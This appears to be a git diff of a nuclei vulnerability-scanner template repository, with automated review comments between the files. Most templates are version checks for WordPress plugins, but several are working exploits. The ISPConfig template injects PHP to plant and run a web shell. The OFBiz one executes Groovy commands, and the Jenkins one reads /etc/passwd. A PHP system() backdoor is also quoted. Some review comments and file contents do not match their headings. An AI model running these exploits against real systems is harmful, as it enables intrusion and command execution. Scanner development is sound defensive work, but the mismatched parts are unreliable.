0000000000..a8e1f1a930 --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-35047.yaml 
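Review bot: The `name` (`Minio post policy request security bypass`) does not describe what the template checks; the description and the `/minio/bootstrap/v1/verify` request concern environment-variable disclosure, so a name such as `MinIO Cluster Deployment - Information Disclosure` would match. `tags: cve,cve2023,` ends with a trailing comma that yields an empty tag, and the file lacks the blank lines between `id:`/`info:` and `tags:`/`requests:` that the other templates keep. The body word `"MinioEndpoints"` only confirms the endpoint answered; a word like `"MINIO_ROOT_PASSWORD"`, which the description names as the disclosed value, would tie the match to the actual impact. The template also has no `metadata` block and no NVD reference, unlike its siblings in this commit.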
@@ -0,0 +1,56 @@ +id: CVE-2023-35047 + +info: + name: "All Bootstrap Blocks <= 1.3.6 - Cross-Site Request Forgery to Plugin Settings Reset" + author: topscoder + severity: medium + description: "The All Bootstrap Blocks plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.3.6. This is due to missing nonce validation on the reset() function. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4a7a15ab-4f13-4eb1-aeb5-143230308871?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L + cvss-score: 6.5 + cve-id: CVE-2023-35047 + metadata: + fofa-query: "wp-content/plugins/all-bootstrap-blocks/" + google-query: inurl:"/wp-content/plugins/all-bootstrap-blocks/" + shodan-query: 'vuln:CVE-2023-35047' + tags: cve,wordpress,wp-plugin,all-bootstrap-blocks,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/all-bootstrap-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "all-bootstrap-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.6') diff --git a/nuclei-templates/Other/dahua-wpms-addimgico-fileupload.yaml b/nuclei-templates/CVE-2023/CVE-2023-3836.yaml similarity index 100% rename from nuclei-templates/Other/dahua-wpms-addimgico-fileupload.yaml rename to nuclei-templates/CVE-2023/CVE-2023-3836.yaml 
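Review bot: `tags: cve,wordpress,wp-plugin,all-bootstrap-blocks,medium` lacks the `cve2023` year tag that every other CVE template in this commit carries and repeats the severity as a tag; suggest `tags: cve,cve2023,wordpress,wp-plugin,all-bootstrap-blocks`. The classification has no `cwe-id` although the weakness is a well-defined CSRF class; fill it in from the NVD entry. The two regex extractors named `version` are identical apart from `internal: true`; a comment such as `# second extractor is non-internal so the detected version is shown in output` would explain why both are kept rather than leaving it looking like a copy-paste.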
diff --git a/nuclei-templates/CVE-2023/CVE-2023-46818.yaml b/nuclei-templates/CVE-2023/CVE-2023-46818.yaml new file mode 100644 index 0000000000..742fd14a37 --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-46818.yaml 
@@ -0,0 +1,144 @@ +id: CVE-2023-46818 + +info: + name: ISPConfig - PHP Code Injection + author: non-things + severity: high + description: | + An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled. + reference: + - https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/ + - http://packetstormsecurity.com/files/176126/ISPConfig-3.2.11-PHP-Code-Injection.html + - http://seclists.org/fulldisclosure/2023/Dec/2 + - https://nvd.nist.gov/vuln/detail/CVE-2023-46818 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2023-46818 + cwe-id: CWE-94 + metadata: + verified: true + max-requests: 1 + product: ispconfig + tags: cve,cve2023,ispconfig,php,rce + +flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6) + +variables: + lang-file: "{{rand_text_alpha(26)}}.lng" + websh-file: "{{rand_text_alphanumeric(32)}}.php" + websh: "<?php print('____'); passthru(base64_decode($_SERVER['HTTP_C'])); print('____'); ?>" + websh-base64: "{{base64(websh)}}" + payload: "'];file_put_contents('{{websh-file}}',base64_decode('{{websh-base64}}'));die;#" + payload-url-enc: "{{url_encode(payload)}}" + echo-cmd-hash: "{{rand_text_alphanumeric(32)}}" + echo-cmd: "echo {{echo-cmd-hash}}" + +http: + - raw: + - | + POST /login/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&s_mod=login + + matchers: + - type: dsl + dsl: + - 'contains(header, "Set-Cookie")' + - 'status_code == 302' + condition: and + + - raw: + - | + POST /admin/language_edit.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + lang=en&module=help&lang_file={{lang-file}} + + matchers: + - type: dsl + dsl: + - 'contains_all(response, "_csrf_id", "_csrf_key")' + - 'status_code == 200' + condition: and + + extractors: + - 
type: regex + name: lang_file_location + group: 1 + regex: + - "<legend>Language file: (.*)</legend>" + internal: true + + - type: regex + name: csrf_id + group: 1 + regex: + - "_csrf_id\" value=\"(.*)\" />" + internal: true + + - type: regex + name: csrf_key + group: 1 + regex: + - "_csrf_key\" value=\"(.*)\" />" + internal: true + + - raw: + - | + POST /admin/language_edit.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + lang=en&module=help&lang_file={{lang-file}}&_csrf_id={{csrf_id}}&_csrf_key={{csrf_key}}&records[%5C]={{payload-url-enc}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + + - raw: + - | + GET /admin/{{websh-file}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + C: {{base64('§echo-cmd§')}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "{{echo-cmd-hash}}" + + - raw: + - | + GET /admin/{{websh-file}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + C: {{base64('rm §lang_file_location§')}} + + matchers: + - type: status + status: + - 200 + + - raw: + - | + GET /admin/{{websh-file}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + C: {{base64('rm §websh-file§')}} + + matchers: + - type: status + status: + - 200 +# digest: 4b0a00483046022100b1477a1e39d3f98efffd283596a2a924a6381e8a6c7a640e99afc1128b907abd022100dac9d4a63ce04aed8df7a74d631dd9774ff4a6e4ee75579fced5cd3c0681d631:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/cve-2023-28432.yaml b/nuclei-templates/CVE-2023/cve-2023-28432.yaml deleted file mode 100644 index 31e39b313d..0000000000 --- a/nuclei-templates/CVE-2023/cve-2023-28432.yaml +++ /dev/null 
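Review bot: The cleanup requests (`rm §lang_file_location§` in http(5) and `rm §websh-file§` in http(6)) are chained in `flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6)`, so if the verification in http(4) does not match, the uploaded `{{websh-file}}` and the created language file remain on the target; the cleanup steps should run regardless of http(4)'s result, e.g. `flow: http(1) && http(2) && http(3) && http(4); http(5); http(6)` — assuming the flow engine treats a non-matching http(n) as false, which the diff does not show. `metadata.max-requests: 1` uses the wrong key (`max-request` elsewhere on this page) and the wrong value for a six-request template; use `max-request: 6`. A `vendor:` field next to `product: ispconfig` would match the sibling templates.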
@@ -1,58 +0,0 @@ -id: CVE-2023-28432 - -info: - name: MinIO Cluster Deployment - Information Disclosure - author: Mr-xn - severity: high - description: | - MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted. - remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z. - reference: - - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q - - https://github.com/minio/minio/pull/16853/files - - https://github.com/golang/vulndb/issues/1667 - - https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json - - https://nvd.nist.gov/vuln/detail/CVE-2023-28432 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2023-28432 - cwe-id: CWE-200,NVD-CWE-noinfo - epss-score: 0.1561 - epss-percentile: 0.95366 - cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: minio - product: minio - shodan-query: title:"Minio Console" - fofa-query: app="Minio" - tags: cve,cve2023,minio,console,exposure,kev - -http: - - raw: - - |+ - POST /minio/bootstrap/v1/verify HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"MINIO_ROOT_PASSWORD":' - - '"MINIO_ROOT_USER":' - - '"MinioEnv":' - condition: or - - - type: word - part: header - words: - - 'text/plain' - - - type: status - status: - - 200 -# digest: 
4a0a00473045022000cb3be4dccb67a32f0d8e5b6ff545dd3f7dfceb822e7cfb56b4b3002db7feac022100be5b794bf3c32f18b6523b6df576787ddd187fc4b41fad051193c2295cdbf114:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/gradio-CVE-2024-1561.yaml b/nuclei-templates/CVE-2024/CVE-2024-1561.yaml similarity index 100% rename from nuclei-templates/Other/gradio-CVE-2024-1561.yaml rename to nuclei-templates/CVE-2024/CVE-2024-1561.yaml diff --git a/nuclei-templates/CVE-2024/CVE-2024-23897.yaml b/nuclei-templates/CVE-2024/CVE-2024-23897.yaml new file mode 100644 index 0000000000..62a1aba442 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-23897.yaml 
@@ -0,0 +1,56 @@ +id: CVE-2024-23897 + +info: + name: Jenkins < 2.441 - Arbitrary File Read + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system. + reference: + - https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314 + - https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/ + - https://github.com/Mr-xn/Penetration_Testing_POC + - https://github.com/forsaken0127/CVE-2024-23897 + - https://github.com/nomi-sec/PoC-in-GitHub + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-23897 + epss-score: 0.41536 + epss-percentile: 0.97188 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* + metadata: + verified: true + max-request: 1 + vendor: jenkins + product: jenkins + shodan-query: "product:\"Jenkins\"" + tags: cve,cve2024,lfi,rce,jenkins +variables: + payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}" + +javascript: + - code: | + let m = require('nuclei/net'); + let name=(Host.includes(':') ? 
Host : Host+":80"); + let conn,conn2; + try { conn = m.OpenTLS('tcp', name) } catch { conn= m.Open('tcp', name)} + conn.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: download\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n'); + try { conn2 = m.OpenTLS('tcp', name) } catch { conn2= m.Open('tcp', name)} + conn2.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nContent-type: application/octet-stream\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: upload\r\nConnection: keep-alive\r\nContent-Length: 163\r\n\r\n'+Body) + resp = conn.RecvString(1000) + args: + Body: "{{payload}}" + Host: "{{Hostname}}" + + matchers: + - type: dsl + dsl: + - 'contains(response, "No such agent \"")' + + extractors: + - type: regex + group: 1 + regex: + - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' +# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2024/CVE-2024-38856.yaml b/nuclei-templates/CVE-2024/CVE-2024-38856.yaml deleted file mode 100644 index 9941027675..0000000000 --- a/nuclei-templates/CVE-2024/CVE-2024-38856.yaml +++ /dev/null 
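Review bot: `let name=(Host.includes(':') ? Host : Host+":80")` defaults to port 80 whenever `{{Hostname}}` carries no explicit port, yet the script tries `m.OpenTLS` first; for an HTTPS target on its default port both the TLS attempt and the plaintext fallback go to port 80, so the check cannot reach the service — derive the port from the scheme (443 when TLS is used) instead of a fixed `:80`. `resp = conn.RecvString(1000)` assigns an undeclared identifier; declare it with `let` like `conn` and `conn2`, and neither connection is closed afterwards. The hex `payload` would benefit from a comment stating what it encodes (the visible bytes decode to `connect-node` with an `@/etc/passwd` argument, matching the description), the `rce` tag contradicts the name `Arbitrary File Read`, and `max-request: 1` undercounts the two connections the script opens.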
@@ -1,48 +0,0 @@ -id: CVE-2024-38856 - -info: - name: Apache OFBiz - Remote Code Execution - author: Co5mos - severity: critical - description: | - Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints). - reference: - - https://unam4.github.io/2024/08/05/CVE-2024-38856-ofbiz-12-14-filter%E7%BB%95%E8%BF%87%E5%88%B0rce/ - - https://issues.apache.org/jira/browse/OFBIZ-13128 - - https://lists.apache.org/thread/olxxjk6b13sl3wh9cmp0k2dscvp24l7w - - https://ofbiz.apache.org/download.html - - https://ofbiz.apache.org/security.html - classification: - epss-score: 0.00045 - epss-percentile: 0.16306 - metadata: - verified: true - max-request: 1 - fofa-query: app="Apache_OFBiz" - tags: cve,cve2024,ofbiz,apache,rce,kev - -http: - - raw: - - | - POST /webtools/control/main/ProgramExport HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)' - - - type: word - part: body - words: - - 'java.lang.Exception' - - - type: status - status: - - 200 -# digest: 490a0046304402206f35bcc3e276d91d4e1a05964d5c2544dded6826a8fb086b21e982b01c50548e02201954774503527bdb87c96c2d208ce0bbe1383893272f091ffcef7b5f14e74a5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2024/CVE-2024-5827.yaml b/nuclei-templates/CVE-2024/CVE-2024-5827.yaml
new file mode 100644
index 0000000000..1138e194e3
--- /dev/null
+++ b/nuclei-templates/CVE-2024/CVE-2024-5827.yaml
@@ -0,0 +1,64 @@
+id: CVE-2024-5827
+
+info:
+ name: Vanna - SQL injection
+ author: olfloralo,nukunga,harksu,nechyo,gy741
+ severity: critical
+ description: |
+ Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `<?php system($_GET[0]); ?>`. This can lead to command execution or the creation of backdoors.
+ reference:
+ - https://huntr.com/bounties/a3f913d6-c717-4528-b974-26d8d9e839ca
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-5827
+ - https://huntr.com/bounties/e4e64a51-618b-41d0-8f56-1d2146d8825e
+ - https://github.com/fkie-cad/nvd-json-data-feeds
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-5827
+ cwe-id: CWE-434
+ epss-score: 0.00043
+ epss-percentile: 0.09524
+ metadata:
+ verified: true
+ max-request: 2
+ fofa-query: body='vanna.ai'
+ tags: cve,cve2024,vanna,sqli
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ POST /api/v0/train HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {"sql":"SELECT pg_read_file('/etc/passwd', 0, 1000);"}
+
+ matchers:
+ - type: word
+ words:
+ - 'id":'
+ internal: true
+
+ - raw:
+ - |
+ GET /api/v0/generate_sql?question=What%20is%20the%20content%20of%20the%20first%201000%20characters%20of%20the%20%2Fetc%2Fpasswd%20file? HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+# digest: 4b0a0048304602210093740affc4c9c3ea0030913d9c4c8802827341e231bdf5ee94a5e7da27ad2d32022100b100c84672ff47b8e2b2a407027df4880147e2a846c9a92947b1e1415e2cd870:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
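Review bot: The injected training SQL uses PostgreSQL's `pg_read_file`, which only works when the Vanna instance is wired to PostgreSQL and connects as a role with `pg_read_server_files` or superuser, yet the description frames the bug as the DuckDB integration — on a DuckDB-backed target the `train` call succeeds and the second step can never match, so the description should state the PostgreSQL prerequisite (or the payload should use a DuckDB-native file read). In the Flask API I am aware of, `/api/v0/generate_sql` returns the generated SQL text and execution is a separate `run_sql?id=` call, so a `root:.*:0:0:` body match on the generate step is worth re-confirming despite `verified: true`. The first request also persists attacker-controlled training data in the target's vector store with no cleanup, which the description should flag for scan safety, e.g. `Note: leaves an injected training entry on the target; remove it via the id returned by /api/v0/train.`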
diff --git a/nuclei-templates/CVE-2024/CVE-2024-6017.yaml b/nuclei-templates/CVE-2024/CVE-2024-6017.yaml new file mode 100644 index 0000000000..57e4314b01 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6017.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6017 + +info: + name: > + Music Request Manager <= 1.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Music Request Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/119f87d0-dcd7-487a-bee5-ebcfbcb0a62a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-6017 + metadata: + fofa-query: "wp-content/plugins/music-request-manager/" + google-query: inurl:"/wp-content/plugins/music-request-manager/" + shodan-query: 'vuln:CVE-2024-6017' + tags: cve,wordpress,wp-plugin,music-request-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/music-request-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "music-request-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file 
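Review bot: The `classification` block carries the CVSS vector but no `cwe-id`, although the description pins the root cause as missing nonce validation; add `cwe-id: CWE-352` so the CSRF nature is machine-readable like the other CVE templates in this repo. The check itself only reads `Stable tag` from readme.txt and never touches the unprotected action, so the "Cross-Site Request Forgery to Stored Cross-Site Scripting" in the name is inferred from version alone — a one-line `# version-based detection only; does not exercise the vulnerable action` above `http:` would make that explicit for triagers. `shodan-query: 'vuln:CVE-2024-6017'` is self-referential and Shodan's vuln facet rarely covers WordPress plugin CVEs; `http.html:"/wp-content/plugins/music-request-manager/"` would be the usable query.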
diff --git a/nuclei-templates/CVE-2024/CVE-2024-6018.yaml b/nuclei-templates/CVE-2024/CVE-2024-6018.yaml new file mode 100644 index 0000000000..f4b24ec66c --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6018.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6018 + +info: + name: > + Music Request Manager <= 1.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Music Request Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5badcfc6-aaff-4c8e-8649-98d71d7a47ec?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-6018 + metadata: + fofa-query: "wp-content/plugins/music-request-manager/" + google-query: inurl:"/wp-content/plugins/music-request-manager/" + shodan-query: 'vuln:CVE-2024-6018' + tags: cve,wordpress,wp-plugin,music-request-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/music-request-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "music-request-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file 
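Review bot: Plugins frequently ship `Stable tag: trunk`, in which case the `([0-9.]+)` capture fails, `version` stays empty and the `compare_versions` DSL under `matchers-condition: and` silently reports nothing even though the slug word matcher hit; if that fail-closed behaviour is intended, say so with `# Stable tag may be "trunk"; the template then yields no result rather than a guess` next to the regex. `classification` should also carry `cwe-id: CWE-79` for the reflected XSS described. The two `version` extractors are byte-identical apart from `internal: true`; if nuclei exposes the exported value to the DSL as well, the internal copy is redundant — worth confirming against the nuclei version this repo targets.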
diff --git a/nuclei-templates/CVE-2024/CVE-2024-6019.yaml b/nuclei-templates/CVE-2024/CVE-2024-6019.yaml new file mode 100644 index 0000000000..9a52e9a613 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6019.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6019 + +info: + name: > + Music Request Manager <= 1.3 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + The Music Request Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/29ef1755-f1c4-4251-bd4c-2fe97f291994?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-6019 + metadata: + fofa-query: "wp-content/plugins/music-request-manager/" + google-query: inurl:"/wp-content/plugins/music-request-manager/" + shodan-query: 'vuln:CVE-2024-6019' + tags: cve,wordpress,wp-plugin,music-request-manager,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/music-request-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "music-request-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file 
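Review bot: This is the unauthenticated stored XSS — the only one of the three Music Request Manager CVEs in this commit that needs no victim interaction — yet the detection is the same readme.txt `Stable tag` fingerprint as the CSRF and reflected variants, so a hit means "plugin ≤ 1.3 is installed", not "the request path is injectable"; the description should say so, e.g. append `Detection is version-based via readme.txt and does not confirm exploitability.` `cwe-id: CWE-79` is missing from `classification`. With `redirects: true` a readme.txt request that lands on a soft-404 page echoing the requested path can satisfy the `music-request-manager` body word matcher, leaving the version regex as the only real guard.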
diff --git a/nuclei-templates/CVE-2024/CVE-2024-6088.yaml b/nuclei-templates/CVE-2024/CVE-2024-6088.yaml deleted file mode 100644 index 4ff7356f84..0000000000 --- a/nuclei-templates/CVE-2024/CVE-2024-6088.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: wordpress-account-registration-enabled - -info: - name: WordPress account registration enabled - author: topscoder - severity: info - tags: wordpress-misc,wordpress,wp-core,core,info - -http: - - method: GET - path: - - "{{BaseURL}}/wp-login.php?action=register" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "Register" - part: body - -# Enhanced \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6688.yaml b/nuclei-templates/CVE-2024/CVE-2024-6688.yaml new file mode 100644 index 0000000000..7994de3ee7 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6688.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-6688 + +info: + name: > + Oxygen Builder <= 4.8.3 - Missing Authorization to Authenticated (Subscriber+) Stylesheet Update + author: topscoder + severity: low + description: > + The Oxygen Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the oxy_save_css_from_admin AJAX action in all versions up to, and including, 4.8.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update stylesheets. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/78c88402-52ca-44ff-8767-1f843fcb66fd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-6688 + metadata: + fofa-query: "wp-content/plugins/oxygenbuilder/" + google-query: inurl:"/wp-content/plugins/oxygenbuilder/" + shodan-query: 'vuln:CVE-2024-6688' + tags: cve,wordpress,wp-plugin,oxygenbuilder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/oxygenbuilder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "oxygenbuilder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.8.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6690.yaml b/nuclei-templates/CVE-2024/CVE-2024-6690.yaml new file mode 100644 index 0000000000..8c90973a76 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6690.yaml 
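Review bot: `severity: low` contradicts the template's own `cvss-score: 4.3`, which sits in the CVSS v3.1 Medium band (4.0–6.9), and the sibling templates in this commit with 4.3 (CVE-2024-7688, CVE-2024-7817, CVE-2024-7820) are tagged `medium`; change to `severity: medium` and `tags: cve,wordpress,wp-plugin,oxygenbuilder,medium`. `cwe-id: CWE-862` would also be appropriate for the missing capability check the description names. Worth double-checking the slug as well: the readme path and fofa/google queries all assume `/wp-content/plugins/oxygenbuilder/`, and Oxygen Builder is a premium plugin whose install directory may differ, in which case the template can never match.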
@@ -0,0 +1,59 @@ +id: CVE-2024-6690 + +info: + name: > + WP Content Copy Protection & No Right Click (PRO) <= 15.0 - Open Redirect + author: topscoder + severity: medium + description: > + The WP Content Copy Protection & No Right Click (PRO) plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 15.0. This is due to insufficient validation on the redirect url supplied. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fba24935-5bab-4395-b05e-7bb5d5a1694d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-6690 + metadata: + fofa-query: "wp-content/plugins/wccp-pro/" + google-query: inurl:"/wp-content/plugins/wccp-pro/" + shodan-query: 'vuln:CVE-2024-6690' + tags: cve,wordpress,wp-plugin,wccp-pro,medium + +http: + - method: 